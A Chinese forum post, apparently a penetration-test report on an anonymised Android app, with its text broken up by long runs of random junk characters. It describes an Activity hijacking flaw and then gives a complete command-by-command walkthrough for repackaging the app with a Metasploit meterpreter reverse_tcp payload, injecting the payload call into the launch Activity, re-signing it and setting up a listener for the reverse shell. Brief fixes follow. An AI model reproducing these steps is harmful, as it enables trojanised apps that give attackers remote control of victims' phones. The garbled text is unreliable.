- v( B5 d( X# }2 y7 m4 z: E- J$ f- j/ e   ( }# O) i. x& \; W " f3 p7 F# U* l2 U8 h# g

$ s8 V, [+ m3 u' |6 [8 E) R6 h# M* X E# w. F6 ]7 @

3 }5 s( O! ~8 j+ Q . I3 Z8 V2 R; v4 X 2 检测结果                    0 L0 z- E$ {" f7 t; h% h $ ?0 q# t$ F4 p8 P) p

) ~; O5 t/ _0 q / m) Y+ T/ m; S X Y: A

+ G7 l. C* _1 y: m! ~* Y ( g8 o! ]0 W8 M% Q- a. K4 u 2.1 某某某 a" P# v/ ?4 o 6 E, a9 o" X3 m' C D; w* L+ e

, `, [0 `3 l! Z& H 7 g3 J v S3 X& C0 l5 }

6 h" y u" V# B" n/ d & ]+ E( J; g- W$ w: f 2.1.1检测目标 * k4 `$ y* B+ I$ F6 G+ }5 k0 [7 O- v2 p) X! {; n) |

. q' N" f' [" n* q' @7 [) U - G' _0 [# ^5 x7 k6 p1 y9 ~2 U

7 U7 z, n* L9 f( x & U! t, |3 n' v w0 M1 l) q 目标地址: 某某某某某某APP 4 @& t) Y( o+ [+ e% b2 w5 z ) S8 N) ~% Y6 d1 _

+ }5 [* \. a" \3 S8 h" Z . G$ Q: H, N' F! i- B7 w; B9 g

0 z( Q6 ?: E% @, P+ @0 G2 M, k% }* c$ f 2.1.2检测结果 . g5 V6 i- N5 ]4 o. S 1 |7 B3 O6 n# J9 `3 h( M/ r% P: i

8 }' b+ N' g. |1 x) O, L 3 ~* }% x+ a, E: R6 [

9 ?1 A1 F* R6 ]6 Q- U3 f) B3 y% @3 S: o1 N 2.1.2.1 0 B; U" X5 t/ x4 o) S2 E C K/ j6 w/ q! E! ]

7 V6 t% O4 n0 g# G l6 ?# R6 ]7 Z6 R) Q

7 V% H0 S9 n0 E: B . h. ]6 a" x1 k9 f' p& j' {* c 漏洞链接地址:某某某某某某APP $ Y' g- c8 x. j" |0 n9 y ! t* W/ O0 c! _* U% }! L& F L1 R; u

% V8 T! Y: ~1 ~" ~# G6 V! D& x4 J' p! p7 x0 `

: r3 V6 j; j. L0 k0 s3 d, S, {) I" L( w6 {9 j j9 e   " t% w, s A; {! P- q7 d( i! X+ v% ^7 R& w( K/ K

" ^( @. j7 h0 D$ X9 w 5 y! m S* O" h

8 A# ], M$ {: G / E( _. k- n3 _* K9 m, [$ G 漏洞分析及取证: ; V, n! G" @" g! e0 a# ?. |% r7 A2 g7 t4 R0 n5 E* Z9 a

6 s( f' _) U8 ]8 J+ I 4 W, w2 Y4 j: E& Z7 c+ Q

% u3 A8 p; I0 o v: n | % k% k5 \, T+ P) V/ m& R" X                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: # o+ A' R6 t' Y! H7 u3 t/ y* Z$ q& X9 o( L! h, l5 C4 B

# y. ?/ w6 `/ W- t& U+ m3 P! K 0 N9 m% Q# v; j$ r% `" z9 e- ]) e

1 X+ {" d% N& F ' R0 a4 X4 R) C      " Q f" }, w$ q7 Y( {0 X+ Q$ h % N4 o. _3 _) q$ f% o, \# Z

9 P" o" D/ o3 P5 o - l# z% W4 }/ x

$ }6 F f u5 V Z * b8 g- @! I9 f                       # `4 [) ^9 i) c+ D, e N% f+ l 9 P, L5 v* E& f4 J8 ~

/ ^1 R1 Q3 p0 P; |4 _# \ 9 y* S0 k* F' {% C

9 v: W- R" A6 p3 t0 t& d : H1 A" @) z9 l 9 Q1 j# _/ \" n6 [1 c/ ]5 i+ \/ h6 K 8 T+ L. l9 r6 W u8 }) Z/ ]

* U6 J- Z: C* N7 b, R$ I5 q& A! U9 E* R! W

5 Y* c4 M. z# g5 C5 Y/ P5 c$ A6 C7 k4 L @; a0 [, T7 [3 b ! L) r9 e6 Y! T1 K. O) O8 G

4 [; m7 a2 ]3 X( u& m 4 q( \, v2 _% d+ d; a* B6 J

) q" I0 G! D( b/ q: Q8 P4 E4 P k! Q / U# `! R. _. z. Y1 { & n" f( F! Q2 n* J; H- D6 G1 }/ l" _2 y

; ~4 m9 ?- i$ m: I" j. X4 p$ M : A; o7 m: P t+ w$ s

\# _; t0 P+ P: Z2 s6 E 8 `3 M. z, ~8 Y0 a& D 漏洞危害:高 6 ]7 p9 m- {7 G9 O2 g4 }- D 4 _/ o/ L/ Y0 d% _- e

' V' g7 u! O! J - ~- E. e- }9 s# w1 M, i
, a' h" f- D' Q- U4 @) z" S& C) `8 ]2 B ( ~3 ~0 R! [6 S* x% z7 M7 e* Z( p* F: x" E, a3 I6 d, U/ B" t% ]$ T" j+ H% B( |. A$ k( S; q3 a+ _; f+ J. p5 P+ g7 q. N! e' D7 B6 l0 m+ G8 H+ r/ O! J5 J3 `( S+ E* H% l( [2 S% e$ S2 ?! f4 T( U% G. t0 j6 R; X$ ]% h+ m2 H3 M9 s' G- r" F. |5 Z4 i! G( x, y( p6 ^( X6 Q# M$ o3 e; |- F1 E' r- u* a; x# }; P. K/ P/ x+ { P7 S! d8 S6 ~; Y {2 V6 U1 Z; } e& U; U3 C' N3 y m$ O1 ~- x# G) P( H n7 a- K0 U0 _3 f0 ]. b, C3 O) f. v* [9 s' _9 P0 Z8 S. H# G) j' M6 _; f+ t S; N7 y% b" h# G6 O7 t* H( e( r( H4 t4 K5 D7 s& Y0 A( v) I7 @$ O! b& J; a& |' `- k7 D5 Q; D: Z- A$ _ Q% ]. g0 r
0 }5 ]2 b2 C3 X & M# {! a. O4 s8 X7 B) \0 p

- m& ?+ c7 b( \- o$ W! x# L. \; \! x' l. Q. @ 严重程度 7 U m2 M; w L- {$ j Y 6 K3 A* d4 u( B

$ ?) T, Q6 i$ |% F d " d' V+ ^) {. q" l' k0 ?0 R8 F
' `) C/ T; I) i. u- N & t m9 k* @0 X c4 z9 B

+ U; [: Q/ j1 `' F+ ~ " n- N' _7 x X! u* C. n* O ! q+ _$ c; ~- d" ]: n8 G, `) q. t: g6 Z1 N7 N

8 [( b* o" u) G2 n% R# d1 u# `6 D$ [, e& h3 v9 ?
) F' @1 {7 M2 F* m0 E : F! h1 E! f2 w) x# j5 r: h1 y

6 R5 u8 h1 H! D 9 s$ V+ N0 v1 @; c( K ; m$ q4 z7 {6 A 4 {0 d: I7 N% E) r9 W

$ e- u- u X& f/ S! m _4 T' g ` 1 z4 G9 J" w' s, I/ f% X
: C& g$ \: V% k7 B' I1 K L* \: y* @+ d9 i& ~

6 S. F* y( Z3 w! a6 b- t, q( i4 ] ; G Q) A. e, t& j. a& [8 n 2 i/ J% p( P/ F; [/ [ / f' T7 P: F; W+ K2 f) k

7 K. j0 X6 G) Y, n9 R% |+ J& U% f) r) o8 g$ a4 \0 g. Y) s
0 d0 y0 g; v- \2 |# W , f6 B( k) r! v' O2 p

5 W/ X' p. M2 u U6 \9 Y! E$ J Q" [1 u( D+ v2 C2 F) c+ ?   ! P: I6 Y% ~2 }: J6 V4 x# ^ " ?* ~4 V4 A; o& g+ Q i

2 r: b/ z- |' N8 @ 3 o [+ v8 V. { [; E
& b5 v( ~" X5 J) ]( ~8 }. G) J+ R6 X& G2 J

0 c5 F( z I" A2 S. W. w4 @1 n+ L+ t4 }( [ - N; Z6 Y6 d2 t9 H , c/ I5 o" U( C8 b

9 j3 h6 m6 R) y$ W ( | U Y. G6 m' f3 o' w4 n9 ~
: @( y! c0 b |7 P 3 e' h/ B0 g" G/ l6 t2 a4 P

' R! A5 f6 J/ ~0 s$ O2 y0 M5 H0 W; f . y" n- ^4 U( w   ; T9 t0 ]0 G; A6 d* W - J3 Q' E5 l5 H9 G

0 b$ V( D/ y( i; F/ { : b. j4 s* k b+ P# H
) v& l. B; r! `8 V/ S, Y; u- I * d$ t6 `) S) l$ U
M0 X+ u, @4 _0 \ ; Y% k u6 d6 M) I+ t! A

( V/ q% [4 b! {& I- a; c$ W& d $ Z7 Q1 ~& r6 ^: ~9 t   4 F2 A1 E4 f& H# | 6 c+ G( O. C& p# n* y+ P' [; {

6 u$ {3 h1 S0 [5 M- Q" i. V; J8 ~; I3 G* r" T5 N

, s6 {7 E# [% e" K! W/ B 4 B4 x" D( g; s5 L% h& w 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 6 o8 T. R( t9 _9 ^' Y4 \/ i8 f / x! O- J6 ]# S- e& N

$ F6 O( y) z7 {: L: k5 i: b* d8 D7 `

2 D( c2 C; f! o/ P ' Y/ i$ V- \4 L3 l4 H! d( D6 W           : I' G. ^3 h! x+ O6 J9 b # v# i6 b9 G4 N2 v! \

$ j( g# Y6 ?0 T; ]1 v! i% g! w( v # [9 ^8 m9 D8 _* i( ?

- k5 t# S- I4 L5 l' @4 Y3 L/ S. a) d4 A" ?$ T. @" {/ S   0 A. G" W3 Y5 n6 ^0 v$ G + }7 y, R* H! F

4 |* z2 \/ ?) E. l4 p & n+ B9 l% K' j

" ]4 h% Y1 h0 V( ^* D N0 B* u" P6 l; F* X- w) X% l 2.1.2.2 . ]- `; n' z3 t3 I$ m) d0 u ' P' K C6 d8 Q6 Z; b

! H( p7 K2 [+ K; p7 ^ 0 e: g: t! j h% ]+ A) t7 t

- N T% R# P( N) {8 C 6 i6 i5 m& v# [: i 漏洞链接地址:某某某某某某APP 6 E0 k5 `) B" ^% A" _# [3 j. D* N4 O% x" H) Q4 y, @: z6 V% c* K q

1 ~8 `8 K* ]2 v$ r! h - I' F6 ]3 i% j/ W

( k' B! X- a, z$ h* P; y5 m" j9 k$ F$ u 漏洞分析及取证: 1 P4 F9 w; s0 V( k9 A6 h" z7 V, z7 C( P; ]

& T/ D" }( [3 J- P+ |! @5 E % T7 k9 T# f& e1 f4 w. V t$ f

l9 H7 A' m. R9 G , N# a4 o$ T6 f: E# C$ y                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 0 L/ E5 H8 e- o' v: `7 ^3 ^: E3 d7 f, d

- |4 v& ~1 _" a2 p4 i9 k8 K* W! l' f/ G3 b3 y+ }

- ~4 i' Y6 l9 {( w n+ e+ O" E% h8 | Metasploit 生成木马 apk : D, L6 l+ W& x3 K8 ? r/ V$ D; d 0 ^8 x2 c0 C9 Q8 u' q6 D t

% H" K1 w! [) c( c. b 0 E( i7 J% ]+ k

0 E- ~. }% S- J! |3 E9 T # M- Q' S: X4 N0 L! _ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 6 ~" e4 o* ^- S- t; ]' Y1 }2 C0 N' w+ ]! @' a3 ~" ^: m* A

; Z, D! Q! L# ?# X& w7 n ?7 f% e4 _( {; C- ~. a

0 l" V R ~5 y$ Q . g2 N2 V- ]5 e 反编译目标apk和木马apk 2 R: l& | T/ d# P, a . ~$ l) H9 p2 Y) I R

; R3 s3 |) O" z# F2 L' M " ^) ^) r0 N3 Y* A$ U* x' I" N

# J. h: a: L. e9 I7 C8 {: s; G! V3 h7 ^3 \% K5 t% v apktool d target.apk
0 H5 P8 o+ C, m 7 t6 g2 F3 p( ~# P; |# ^ apktool d cockhorse.apk
& g/ `/ l- L& o; c# |* } ! G% w! A+ [) M( [3 f5 r% \

4 g5 l3 Y9 G/ C# p: u6 x; w" W" W* Z Y8 M: c. w/ n2 I/ `

8 r: c' n# h1 {2 z) @ 2 b5 o& c, |. q: S" C9 X6 R 木马 apk 注入目标 apk $ G- ]1 |7 S" l3 D; \; L$ u 8 r# }" ]. Y3 e9 Z) K

" `% ]: ]' a4 T; ? a + {& ?, m5 Q6 u/ n3 X0 ^) [) H& i

4 N9 _0 J" t3 S& }/ M. C , @: d1 a3 j; Y% {* B 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
' m0 _4 U; G+ C# g J ' b O! c+ o* B invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
& ]- | a* d" D( O0 i . b7 v# \- k$ l/ B

5 z2 W" J1 K& `3 M& W: u6 z / m& X0 z0 f0 f5 ~

( Y/ l& q" b6 s+ L: E # W6 h: U- Y! y+ k 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 8 f; r% g! V$ { C5 _4 U/ ?8 M# u( {* j& w9 S1 h- S+ t m

3 w4 m$ T% N, J0 P- m6 J) O9 X1 w4 O

9 f6 y1 a1 j N# w! u2 ~5 Y ! `% p8 {, m! u+ M; v/ A 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ o9 H; B r6 x! f7 ?7 a- f. ` $ ?- }1 [# I4 b- n$ [0 Q! h. ^! ]

( o5 t% M4 w6 z) [& A 6 e8 Z, x& _, c* Y4 `4 P8 @6 a

: X3 x: {- X6 n& e5 a. }8 U5 j5 s* G1 j% }* |* c 回编译生成最终 apk + P- p: x# u' z3 p1 [4 Z6 j/ T4 k( ?; Q/ |& n* `$ [

: v0 h5 r6 a! M* @5 |) J! F8 G9 t3 e& e6 S) W, L7 n0 Y+ }9 N) v

4 M; h8 z- R t# n% F ! Z N, B+ t3 U 重新打包 8 r' j$ ~$ q# f' X% Y# H7 m 3 Q. k: ~. N, u! J1 K: F

0 V" Y) d2 F, |. b/ Y% { 5 c9 \) P. \1 E ~2 j

5 B) j6 i) ^) V( A $ H M2 K0 c/ N6 | apktool b -o repackage.apk target_app_floder 2 o' A3 x4 \6 G( x6 l. E8 I $ U" \4 z- C' j0 I: X6 s

) @: n! D9 U9 D0 D' v' h' S) C: N( `+ q* v. } B/ F0 l

# B! M. j; W: L& x% A & w/ N) x9 @9 C( M( p+ V! ^0 q 创建签名文件,有的话可忽略此步骤 ; G/ x$ n- _& g 4 U" z) q/ K: U# i! D. ?. N

! i! ]9 q. G/ |( ?& P! c" I 5 I% A( H; v: v) x2 `

( b0 H9 w; ?% Z- q9 H, ^ 0 p, Q( H) ~6 t keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ; }" t& d$ n% F& y8 u$ Q4 X ! H4 f' {& |6 g: H* r% J

/ q/ w' L8 R6 X) N! v) Q. S | {2 R8 b

6 ^: W7 ^7 F' B. P* a, v: y! K & w2 F+ |* w7 k; @3 f4 w 签名,以下任选其一 3 Q) c8 T% }4 |0 x * ]- a% c3 p3 N3 a

5 p/ M0 Y: t# n5 a2 Q2 w- b 4 U' q8 ]" Q% R4 `7 \

" l, ?. G- H. r& v* h & i- h/ m) Q' l& [2 t4 C% Z jarsigner 方式 " _; a. X5 O; [( F m 2 n1 G! }( G9 q2 U3 Q

. m2 Z% N1 e! N5 h9 E, |; L2 h% \0 i. M5 q: z) D u# H

2 e" e/ s' y) M; R: I* a; [! v 3 s& v. u! |' v6 i3 j5 L2 D& c jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ! _! |, b, ]; Y* P2 @0 |5 @1 u" W5 P- w

+ a& p2 O$ V, A: C$ ?- I- C 5 O* c8 `- ^* ?8 ?6 g

+ |. _" M0 Z( N" F+ p# `$ V ( A2 n0 {3 C0 G* j } apksigner 方式 4 E+ l6 |1 V/ ]0 E( T$ |$ h) O5 u6 {1 }4 |- v0 I) _- o

w# v* \& C5 l, Q ; s$ z' B( F5 g

7 a4 g0 c9 q% y1 U- x, u+ _& x , H" Q( ?3 U$ l7 R5 U7 T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk * i6 I9 Q$ E+ ^- Z) c ( f' r# C9 s) y/ G; H

" L$ J( I, y, x3 ^5 D' W4 o* p, j3 y

1 j% c8 m7 O7 k( ?6 a! x; H: h c) \4 U9 j. q/ T( h5 J5 O# m 如需要禁用 v2签名 添加选项--v2-signing-enabled false ' x0 G$ D: Y: Q3 L+ S4 T! h / A, E" \ d2 u* u

' A! |& i# \/ E4 R5 v" {2 L1 K9 g% }6 n% Y) ~: a3 C

8 t6 J- p5 H' ]/ \ - X# u+ }3 `8 i; w 验证,以下任选其一 ' T1 c8 P! m! o" d. R& Y1 I( P B9 j" Q4 W7 U% {

?) W4 w' p- A0 a/ Z# H! ]; H8 e0 c' f/ T3 ~+ |

3 P& m+ P, A9 C; {" { 4 d6 P9 t0 h( E& @0 I jarsigner方式 1 d, Y& w6 v! o7 r6 | l! [6 [; ~# O, h; s$ ]6 g4 B" F, G4 v( e

2 |" I- R* C& w- e5 s ' G% r; B q0 a- p: @; E6 }

( l9 \5 A: E# k! p/ _) l 7 K$ y9 N& Y0 k* [ jarsigner -verify repackaged.apk $ N% A; J( J) ~# U' r' S , R0 E# {! j0 f* T J

$ v2 N6 E$ r* i# r1 a! \7 Z + d M; B4 r$ T% [7 i, ]2 G: {) z

& C, T" f9 u/ D6 O- A5 Q e; B$ x8 S/ K5 k0 X apksigner 方式 8 A2 u3 u- h# q; M4 @ - x- O, `& a: Z, V& N5 E

1 v, k# \4 M% j* U+ p/ _ 1 a9 d6 q, {2 r' ^& }

$ Y1 q. T5 v. t* j9 {5 j % B* T7 r9 ]2 x7 K+ Q6 ~) ? apksigner verify -v --print-certs repackaged.apk 4 J. d9 F3 j5 O: W! E + p0 I F8 u2 R- M3 K5 y

& d- ? [& I3 q# _' h0 [, s/ y: W. X4 v9 @1 d8 B* ]1 W8 t7 s" S

9 o% I, p! q, U1 ~) t2 t5 m % [4 I* a3 E' z$ D: X keytool方式 , \4 X$ ]: s" l1 S; s" a ' t/ N, E- \$ }: |1 ]; h' W

! d" A2 L2 Z& [$ W6 @ 1 E0 Y6 @7 C4 I/ W

t, i9 _; N3 ]8 z0 ` ' {& i9 a7 n) p3 u keytool -printcert -jarfile repackaged.apk $ c. W* \5 N- I" ~& V& W4 N5 v 1 Q- k) Y' y5 E ] t$ G" z

& `, ?( \9 ]; H: Y. W; {% v9 v% d + v- H: a& i! u' U+ x/ z" J% T

! ?* v8 G9 Y6 P $ n5 Q2 t+ Q9 x; G6 ]' J 对齐 . I2 o6 D+ Y9 v8 B0 Q" x; ^' n 5 l9 u3 R& `6 Q& _; d. N

* D+ P& i" Q: K4 { y% z# B8 a; \. \: O. l o$ T4 r. d" k3 `

+ a/ A! @( g8 @$ X/ l 1 \6 v1 n Y9 E, ~4 Y7 n4 t: l 字节对齐优化 + I7 `: ]! o& r4 y " ~% u0 R5 V+ t

& C, n- m0 X- f' X' F* h; ?4 Z 2 V: N& O) s2 p" v

( Z4 K- h z& Y O- d8 Z ' M; G* _& `9 j3 h zipalign -v 4 repackaged.apk final.apk 3 |0 ~: D/ s* A9 B* i+ `$ B; S9 R! {/ I. J# W. m: |

2 a+ R5 w& m) {9 U2 Y8 I: _7 ~6 n) F * h: H& ^1 F9 ]$ V9 M1 q

- ?. n7 l) \0 n. ?, J& k4 T! H2 x 检查是否对齐 " d1 Q( {, q4 W, g1 ?8 l . y& W4 j E b- c( o8 `! V0 F. l

- A& }) y. i7 n/ o, \ , l/ `; z+ W( o3 a1 v

. L$ E8 l- E6 s2 } * b1 @# r/ A0 }0 b( R) w6 n zipalign -c -v 4 final.apk $ ]& N7 H( a- _& T 6 Q7 k& w9 [8 g: u

' a. S6 j9 H- s( p3 d 1 E6 t# r( v# C. L' Z- M

- X3 m$ _+ P3 Y! K8 |4 p! y 1 x" G1 k% I2 K, X. e0 |6 \ 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 4 i/ c& X5 z8 b6 W& z! m& F6 n. v8 P* w

$ B9 u0 f# u2 \2 _3 ^* T% l 9 p9 C! r# D; M7 r+ q8 @

+ T* N& N- i& d0 Q0 z- _3 ^- i* U }& N- J% B) D 启动Metasploit控制台,配置参数等待上线 ; u; n" d/ ~$ x. J4 r% w1 D0 g& m- ~1 ^2 n" E$ z% p( K

- Q) ` a* w! i9 r; [- R3 M) K; ]1 { 9 F8 p+ A8 q& s( p2 R3 n1 e3 j

" m% E, |0 T) e9 i' O( x ) a. L9 e- D% b$ R D 在终端依次输入如下命令 4 Y& s2 }2 T! n2 p: A- {9 B 5 q6 g4 Y' F3 v: ?- q

7 O0 i9 N& P* M9 g' Z 4 j7 A; g+ n5 q4 n; a L

' _; f6 G% y) r1 ~0 [8 p, w$ n$ P! \0 C7 S2 R msfconsole 9 }+ B1 ]5 H! Z& G1 X . R- @8 W4 K9 l- Q, X

3 z5 Q3 Y7 S$ a. B $ ^$ N$ |+ e/ u1 ~: v8 K) ^' T

' e, d: o2 l( P% V9 Z" ] ! \7 p3 L* \0 y9 S7 @: o use exploit/multi/handler 5 e8 C2 W1 W$ ~4 V& M & w, R2 i9 G( _ O

" l0 V5 ~7 l9 [! }6 A' p$ w4 N 2 [: R. y1 b7 F. I& I. _3 d% A+ p) [

7 \4 k& B2 F7 A1 R0 Q; M$ w, j( i; Q8 R9 p/ I9 E set PAYLOAD android/meterpreter/reverse_tcp ( m% W2 q, L% d3 \% G& u6 }- }/ Y X Q1 k3 J( [

9 ?0 D; G. \! K" M! y& @$ [ 0 J9 Y/ Q2 a* y7 k3 I9 @7 w

, `. U: T* f4 m * d, z; l7 K; v* u9 ^/ b& j' [0 \ set LHOST 192.xxx.xx.xx 9 P% ^( I# f7 y, m6 b. @ / R* R' ? o a9 ^2 R0 t# Y1 W

. x" Z2 @9 Q: Q8 _- Q; y; y 0 f4 M, ~2 a9 O: e$ U

9 a `+ O" b9 j2 H 1 i! I. I) V8 B6 M$ |0 {/ r set LPORT 4444 - Q* ?7 p3 `- |/ I 4 R; W: f& a3 E+ u

- p, C4 E7 F1 v" G' j) U; w7 p- @: \% a, w9 C* R% R( p! M

5 g9 M# y4 [ J; C8 \& Z + m) g7 j D2 p/ V5 e exploit , s) a( G1 A3 `0 Q# r * r; C+ D1 u3 O& g9 f

?) `9 r/ n; x" ], j8 j " ]& ]8 v0 g; z* d4 d

- i1 i2 ]0 W" c$ s) K1 N7 d/ H # R7 j6 L! p2 R1 s' f$ G 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               : V- f9 I5 j, j, O7 w $ t) t; Y" s) Q" l

3 O1 K$ Q" V" n 9 r" a0 u% i- K/ R9 V: i7 f

( e' `5 C+ a0 r ^7 H0 x9 M. L 6 N V$ W8 Y# X0 Q 漏洞危害:中 8 j ]1 `) \, o$ j6 D3 P! d - d& i( H1 E- a0 @

" _) Q: [5 s6 Z2 N. @ ; m! j# G4 E- W0 R
7 Y7 b/ U' r$ d2 \4 m 9 E" G5 K, `: n9 j ) Y) R0 ?" a: i9 |/ Q; X" J9 ^ % u$ w1 r9 m9 ^8 | + A& |! o5 _4 F# H, n( {% E) X5 {+ z4 o! t' i, i( {7 X7 I l$ I3 Z! x; @7 x& c5 v( E ?6 Y, Y ]9 z5 V. h4 n0 O2 E) B3 o; ^( K2 |1 c$ l5 ]( o/ f1 S" b! v2 e( V" _; Z$ `" Q2 R- P( i5 ~# v+ ^% }$ O6 g. }4 [: e1 r! g( p# f7 F2 U+ p2 @* v( C( A) N, U5 C% W2 P7 F( J% p; `: X" A" d: S' O: }* P1 B P. v# d1 L- N) {4 m: U I O7 G- M8 z% \! a" f. v3 e# K. b3 p4 p* h# g' d0 q/ d) M* y8 n7 F0 T# i, x9 `+ K g" S6 h+ n9 x3 }7 p3 H# y5 P: _! T* u) F& \7 \: \" K8 @+ P$ y9 }: s5 `' G, t Z9 r3 f3 T8 p2 _7 U1 Z- y, v0 C2 e8 U3 y' ^9 n" p; b9 s) x F$ g5 @9 m J6 I" p% Q8 d3 t$ z5 ~( N
2 `# k0 o) H/ x3 h 7 r" }% {" x4 r; W+ c

. \* \8 J( I6 t, c! T5 @ J! R4 t' l 严重程度 . Z/ L& {" b, ^6 e L1 O' t; b6 u3 n! b+ @

% Y7 l( e3 ~3 M4 [ - y2 I3 e4 f9 X- |1 M' F
$ V: I9 }5 U2 n; {) _ " M2 G. o# B f3 K

$ X8 ^1 _0 q# g, J : F2 P5 |6 s8 Q4 s) ]) \; b 7 `* _+ |: x1 _4 W7 x9 z ( T( V- g% L _

; P1 ]0 v, h5 D3 C1 L0 l 9 k' k% p, ]" }/ J/ b
/ m' p$ ~/ x( O5 I5 g& b ' g: ]# e7 u3 l0 v5 X, D' Q5 H

/ i) }# m( _3 W9 ^6 F2 e5 W# t # P) {+ [# w9 ]; h0 S5 u; [- L) | ( l4 `( K" O: `! x ^# K9 ^ ) ~) P0 {3 _0 |* I |9 k

' s5 ~' Z& I3 Y$ v' @ + o: g( F* v" O- d3 I
+ P" c" ?# v7 ^- {1 d8 H+ Q: l. l 0 t/ z. |7 z& ?7 T. R. Q

! D- g$ T4 G/ S, j: P D" z 0 U* M! f% D9 r/ V1 u& f, a& W , m* o- k' Z* }* h P# d x/ z9 O, _$ ~" n4 O7 d" n/ s

4 H" A5 }" c1 ~7 E2 p3 u2 q& E4 C1 u4 F9 K' ]7 ]
3 ]4 P$ E' j4 a( A- V! Z; Y, d1 @+ J, U: [: ^" A: O |( i 9 `' f- A/ y6 d `/ U( Y/ k: z g E) B; g# ]

% y2 ]; H( K( b' W! [: ?& h) q! M; x6 ^& v   - v- a8 G. {- _2 B8 W& `- ~9 [5 Q& U& T6 H" g4 \ e/ @+ Z

0 k. t% T4 {( X4 r4 ] `# k5 G $ D3 `: g2 D+ ^ t5 T q
` R8 F) a2 \" C' r ! n9 u3 Y0 b: [3 v7 B4 {. Y

1 ?6 a8 U3 k! b9 d5 N! G$ | # o9 {/ |/ D+ [6 \( _ , }) Z( q% L0 L9 c& [+ n ( R! @1 h- u Q* a1 X: ]" g8 k

8 W5 `/ o: d1 a) y5 l % `1 Q- M' r% \5 V& I5 D; Z' [4 m9 E2 g
1 H# @, H1 ?8 n" }+ _; J3 M # D; o5 j# N+ i( L , `1 ^7 ?( L. t$ B) z( T ( ]0 K# z" ?1 D o1 e' i1 [" I

2 B0 j5 Z0 _; ` 8 s* M! M6 a( @; p9 D) O   ) F3 ^) f b% w. x& E - w3 c- K5 w3 F1 P" T- L5 U/ y# @& T6 x

/ V+ W9 q% ?0 k. A/ x4 ~2 M8 D$ J* ?/ F
3 `1 Z- r9 R8 }" ]' @1 M- P- G' u- ^2 Z. p3 i* w
4 ?, b$ x0 k# q& [9 X3 w# {/ E2 { 8 T" r( T6 G& r6 ^& B6 i4 b

\* k3 {8 Y# ~ 0 m4 Z9 j& t( I2 d a8 W1 x1 {0 c   ; v) u6 i0 Z4 R+ ^ ' z1 k9 Q$ d9 c4 j: n8 x8 `1 g

) P% A) y G4 { 1 Q% A% x0 K* s; Y8 d. V# g$ K

* G5 d6 x; F! D& l- d2 O G" Q/ \! I 8 I/ t: e* |( x( f 修复方法: ' N" \( E! u0 f: V1 F* z* H8 U7 J5 Z0 s; K/ H2 k3 [

" \5 F+ ]- |% W& I $ H/ b) `9 P. ?& A. J4 r# G

$ }3 N$ ~7 u4 z% [& s) I0 G: E$ A2 _4 G               1. APP 启动时应做签名校验防止二次打包。
0 R4 c# d, d4 ?3 `' } 6 v6 j! @% k$ L0 Z 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ) W- N* `1 q$ j& N7 H* Q; Y8 Z2 B4 O) M) z- @7 f( {& j: l1 P

! n& s# W5 t3 \; U4 y, ]: z, @/ ?. Q8 T( E* v" k/ Q 2 Z3 v O' R) w% d : i# X% y2 ^" n: h, u E

" d0 U8 ~5 j3 k' O" r ' J& \/ c( }" x) M& a   # J2 x9 Y2 z$ P. R4 z( m' [7 ^ # y9 N" }! @) d

& T* z8 ?* _( W: U8 s( F4 z1 a D3 s3 N7 Z% X3 ]5 H 0 L3 u2 y+ ~0 K) {9 _0 S5 I0 C% T# y! i( N* d* p

' ^7 r* i. r. [+ r8 o0 U/ i 2 W: k. G4 N h, `# P/ s
0 h `( q4 T: f, `( X2 K& _ ]9 @ 0 B, n K# ^6 }% G

* p$ _! T! m6 v4 x" `4 F0 A / E+ ?# s) j9 S' Y4 D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表